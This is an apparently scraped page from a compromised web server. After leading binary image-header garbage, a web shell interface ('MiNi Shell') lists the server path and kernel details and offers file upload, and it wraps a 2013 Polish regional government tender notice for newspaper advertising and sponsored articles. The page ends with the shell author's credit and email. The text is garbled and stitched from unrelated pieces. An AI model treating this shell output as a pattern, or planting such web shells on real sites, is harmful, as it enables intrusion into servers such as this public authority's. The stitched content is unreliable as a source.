JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130304/87710-N-2013.html

<p class="kh_header"><b>Kielce: Usługa publikacji ogłoszeń oraz usługa przygotowania i publikacji artykułów sponsorowanych w dzienniku o zasięgu regionalnym, obejmującym województwo świętokrzyskie i  małopolskie</b><br>
<b>Numer ogłoszenia: 87710 - 2013; data zamieszczenia: 04.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421901, 3421677, 3421576, faks 41 3445265, 3445723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa publikacji ogłoszeń oraz usługa przygotowania i publikacji artykułów sponsorowanych w dzienniku o zasięgu regionalnym, obejmującym województwo świętokrzyskie i  małopolskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa publikacji ogłoszeń w mediach (w dzienniku 
o zasięgu regionalnym, obejmującym województwo świętokrzyskie i małopolskie) na potrzeby projektu pn. Akademia TRIZ dla biznesu oraz usługa przygotowania i publikacji artykułów sponsorowanych w dzienniku o zasięgu regionalnym, obejmującym województwo świętokrzyskie i małopolskie na potrzeby projektu pn. Akademia TRIZ dla biznesu. <br>
2. Zamawiający podzielił niniejsze zamówienie na dwie części, dopuszczając składanie ofert częściowych. Wykonawcy mogą składać oferty na wybrane części zamówienia (jedną lub dwie).<br>
3. Opis I części zamówienia zawarty został w części B  rozdziału III SIWZ oraz 
w załączniku nr 1 do SIWZ. Opis II części zamówienia zawarty został w części B rozdziału III SIWZ.<br>
4. Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymogami Zamawiającego, określonymi w SIWZ. <br>
5. Wykonawca będzie zobowiązany współpracować z Zamawiającym na etapie realizacji zamówienia, w szczególności zobowiązany będzie konsultować wszelkie wątpliwości. <br>
6. Rozliczenia między Zamawiającym i Wykonawcą prowadzone będą w złotych polskich.<br>
7. Zamawiający dopuszcza powierzenie wykonania zamówienia podwykonawcom. W takim przypadku Zamawiający żąda wskazania przez Wykonawcę w swojej ofercie (Formularz oferty) części (zakres) zamówienia, którą zamierza powierzyć podwykonawcom. Nie dopełnienie w/w obowiązku oznaczać będzie, iż Wykonawca wykona przedmiot zamówienia samodzielnie.<br>
8. Zlecenie części przedmiotu zamówienia podwykonawcom nie zmienia zobowiązań Wykonawcy wobec Zamawiającego. Wykonawca będzie odpowiedzialny za działania, uchybienia  i zaniedbania podwykonawców i ich pracowników w takim samym stopniu jakby to były działania, uchybienia i zaniedbania jego własnych pracowników.<br>
9. Szczegółowe zasady określające sposób realizacji zamówienia, rozliczeń, oraz wysokość kar umownych zawarte zostały w dodatku nr 3A i 3B do SIWZ - Wzór umowy.<br>
10. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.97.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia przez wykonawców wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia. Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (art. 22 ust 1 ustawy)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim potencjałem technicznym. Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (art. 22 ust 1 ustawy)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia. Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (art. 22 ust 1 ustawy)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (art. 22 ust 1 ustawy)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy przystępujący do postępowania zobowiązani są do złożenia ofert, składających się z następujących dokumentów: <br>
A. Wykaz oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu wskazanych w rozdziale V pkt. 1A SIWZ:<br>
1. Oświadczenie o spełnianiu warunków udziału w postępowaniu, (art. 22 ust. 1 ustawy) - wg wzoru określonego w dodatku nr 2A do SIWZ - oryginał;<br>
B. Wykaz oświadczeń i dokumentów potwierdzających brak podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 ustawy:<br>
2. Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy - wg wzoru określonego w dodatku nr 2B do SIWZ - oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę;<br>
3. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do  wykluczenia  w oparciu o  art.  24  ust.  1 pkt 2 ustawy, wystawiony nie wcześniej niż 6  miesięcy przed  upływem  terminu  składania  ofert - oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę;<br>
4. W przypadku gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 3 składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości - oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br>
5. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 4, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę. Dokument powinien być wystawiony z zachowaniem wymaganego terminu określonego w pkt 4 niniejszego rozdziału.<br>
C. Wykaz dokumentów lub oświadczeń potwierdzających brak podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 2 pkt 5 ustawy:<br>
6. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informacja o tym, że wykonawca nie należy do grupy kapitałowej - wg wzoru określonego w dodatku nr 2C do SIWZ - oryginał.<br>
7. W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców występujących wspólnie (w tym spółki cywilne) każdy wykonawca oddzielnie składa dokumenty wskazane w pkt 2, 3 i 6 (oświadczenie i kopia dokumentów podpisane oraz potwierdzone za zgodność z oryginałem przez wykonawcę). Dokument, o którym mowa w pkt. 1 (oświadczenie z art. 22 ust. 1 - oryginał) wykonawcy składają wspólnie.<br>
8. Zamawiający wymaga, aby załączone do oferty dokumenty, sporządzone w języku obcym złożone zostały wraz z tłumaczeniem na język polski.<br>
D. Wykaz pozostałych dokumentów i dodatkowe informacje<br>
1. Wypełniony Formularz oferty - wg wzoru określonego w dodatku nr 1 do SIWZ. <br>
2. W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców występujących wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub  poświadczona notarialnie kopia). <br>
3. Pełnomocnictwo określające jego zakres - w przypadku gdy wykonawcę reprezentuje pełnomocnik (oryginał lub poświadczona notarialnie kopia)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana umowy może nastąpić w przypadku działania siły wyższej, tj.: wyjątkowego zdarzenia lub okoliczności (np. przeszkody atmosferyczne o charakterze katastrof). Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji zamówienia, który przy składaniu ofert musi być normalnie brany pod uwagę - zmianie może ulec termin wykonania umowy o czas niezbędny na uwzględnienie powyższych zmian. 2. Zmiany umowy mogą nastąpić za zgodą Stron w formie pisemnego aneksu pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sejmik.kielce.pl (bip)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój 347.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2013 godzina 12:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój 149 (Kancelaria Ogólna, I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w I i II części jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Poddziałania 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I CZĘŚĆ ZAMÓWIENIA -  Ogłoszenia w mediach (w dzienniku o zasięgu regionalnym, obejmującym województwo świętokrzyskie i  małopolskie) na potrzeby projektu pn. Akademia TRIZ dla biznesu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa publikacji ogłoszeń w mediach (w dzienniku 
o zasięgu regionalnym, obejmującym województwo świętokrzyskie i małopolskie). Średni dzienny nakład dziennika w dniach: poniedziałek, wtorek, środa, czwartek, piątek, sobota (w okresie od 01.01.2012 r. do 31.12.2012 r.) nie mógł być mniejszy niż 8 000 egzemplarzy. <br>
2. Zamawiający planuje opublikować 3 ogłoszenia do końca 2013 roku. Wymiar ogłoszenia prasowego: szerokość: 120mm - 150mm; wysokość: 150mm - 180mm. Podane wymiary są wielkością szacowaną. Wersja: kolorowa. Wyznaczone miejsce: strony ogłoszeniowe. Przewidywany termin publikacji ogłoszeń: publikacja może nastąpić w wybranych przez Zamawiającego dniach, tj. wtorek, środa, czwartek.<br>
3. Projekt ogłoszenia i przykładowa treść stanowi załącznik nr 1 do SIWZ.<br>
4. O konieczności zamieszczenia ogłoszenia Zamawiający każdorazowo powiadomi Wykonawcę najpóźniej na 3 dni robocze przed publikacją, przekazując jednocześnie gotowe materiały do opublikowania. <br>
5. Publikacja poszczególnych ogłoszeń odbywać się będzie na podstawie odrębnych zleceń zawierających datę ostatecznego zamieszczenia ogłoszenia, wymiar oraz jego treść.<br>
6. Wykonawca zobowiązany jest stosować w każdej publikacji logotypy oraz oznakowania zawarte w ogłoszeniu, zgodnie z obowiązującymi zasadami promocji projektów realizowanych ze środków Unii Europejskiej, w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki 2007-2013 oraz zamieścić logotypy instytucji realizujących Projekt, tytuł i ewentualnie logo projektu. <br>
7. Zamawiający zobowiązuje się do przekazania Wykonawcy w wersji elektronicznej niezbędnych logotypów, napisów do właściwego oznaczenia danego ogłoszenia.<br> 
8. Zamawiający każdorazowo żąda przedstawienia do akceptacji zlecanego do druku ogłoszenia, nie później niż na 2 dni robocze przed jego publikacją.<br>
9. Wykonawca zobowiązuje się przedstawić Zamawiającemu do akceptacji projekt ogłoszenia zlecanego do druku w formie elektronicznej.<br>
10. Zamawiający zastrzega sobie możliwość dokonania modyfikacji treści ogłoszenia, jego oznakowania  i/lub opracowania graficznego. Wykonawca zobowiązuje się do uwzględnienia ewentualnych uwag i poprawek zgłoszonych przez Zamawiającego do przesłanego ogłoszenia. <br>
11. Płatność za każdą należycie zrealizowaną publikację, będzie realizowana po doręczeniu Zamawiającemu przez Wykonawcę prawidłowo wystawionej faktury VAT w terminie do 14 dni (od daty doręczenia) na rachunek bankowy Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.97.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II CZĘŚĆ ZAMÓWIENIA - Przygotowanie oraz publikacja artykułów sponsorowanych w  dzienniku o zasięgu regionalnym, obejmującym województwo świętokrzyskie i  małopolskie na potrzeby projektu pn. Akademia TRIZ dla biznesu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa przygotowania oraz publikacji artykułów sponsorowanych w dzienniku o zasięgu regionalnym, obejmującym województwo świętokrzyskie i małopolskie. Średni dzienny nakład dziennika w dniach: wtorek, środa, czwartek, piątek, sobota (w okresie od 01.01.2012r. do 31.12.2012r.) nie mógł być mniejszy niż 8 000 egzemplarzy. <br>
2. Opublikowanych zostanie 5 artykułów sponsorowanych do końca 2013 roku. Wymiar artykułu sponsorowanego: szerokość: 200mm - 250mm; wysokość: 170mm - 230mm. Podane wymiary są wielkością szacowaną. Wersja: kolorowa. Wyznaczone miejsce: strony redakcyjne. Przewidywany termin publikacji artykułów: publikacja może nastąpić w wybranych przez Zamawiającego dniach, tj. wtorek, środa, czwartek.<br>
3. Wykonawca opracuje treść 5 różnych artykułów z zakresu upowszechniania rezultatów projektu pn. Akademia TRIZ dla biznesu oraz zastosowania metodyki TRIZ (Teoria Rozwiązywania Innowacyjnych Zadań) w biznesie.<br>
4. Publikacja poszczególnych artykułów odbywać się będzie na podstawie odrębnych zleceń określających datę ostatecznego zamieszczenia artykułu oraz zawierających tematykę danego artykułu, wraz z niezbędnymi danymi, informacjami i materiałami. <br>
5. O konieczności przygotowania oraz zamieszczenia artykułu Zamawiający każdorazowo powiadomi Wykonawcę najpóźniej na 14 dni roboczych przed publikacją.<br>
6. Zamawiający zobowiązuje się do przekazania Wykonawcy niezbędnych danych 
i bieżących informacji dotyczących realizowanego projektu na potrzeby opracowania artykułów z zakresu upowszechniania rezultatów projektu, w formie elektronicznej, najpóźniej na 14 dni roboczych przed publikacją.<br>
7. Wykonawca zdobędzie informacje i przygotuje we własnym zakresie treść artykułów dotyczących zastosowania metodyki TRIZ (Teoria Rozwiązywania Innowacyjnych Zadań) w biznesie.<br>
8. Wykonawca przedstawi Zamawiającemu do zaakceptowania treść każdego 
z przygotowanych artykułów najpóźniej na 7 dni roboczych przed publikacją wraz 
z propozycją opracowania graficznego. Zamawiający ma prawo wniesienia uwag do przedstawionej treści artykułu i/lub projektu opracowania graficznego w terminie 2 dni roboczych. Wykonawca przedstawi Zamawiającemu do zaakceptowania artykuł w wersji ostatecznej, przygotowanej do druku i uwzględniającej uwagi Zamawiającego, w terminie 3 dni roboczych przed ustaloną datą publikacji.<br>
9. Ustala się termin 1 dnia roboczego na wykonanie przez Wykonawcę poprawek 
w przypadku konieczności wprowadzenia zmian lub korekty błędów na wyraźne polecenie Zamawiającego. <br>
10. Wykonawca jest zobowiązany do oznakowania każdego z artykułów zgodnie 
z obowiązującymi zasadami promocji projektów realizowanych ze środków Unii Europejskiej, w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki 2007-2013 oraz do zamieszczenia logotypów instytucji realizujących Projekt, tytułu i ewentualnie logo projektu. <br>
11. Zamawiający zobowiązuje się do przekazania Wykonawcy w wersji elektronicznej logotypów, napisów niezbędnych do właściwego oznakowania danego artykułu. <br>
12. Wielkość każdego artykułu określa się na poziomie od 10 000 do 15 000 znaków ze spacjami. Zamawiający przewiduje możliwość umieszczenia zdjęcia/zdjęć w danym artykule. <br>
13. Płatność za każdą należycie zrealizowaną usługę, będzie realizowana po doręczeniu Zamawiającemu przez Wykonawcę prawidłowo wystawionej faktury VAT w terminie do 14 dni (od daty doręczenia) na rachunek bankowy Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.97.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com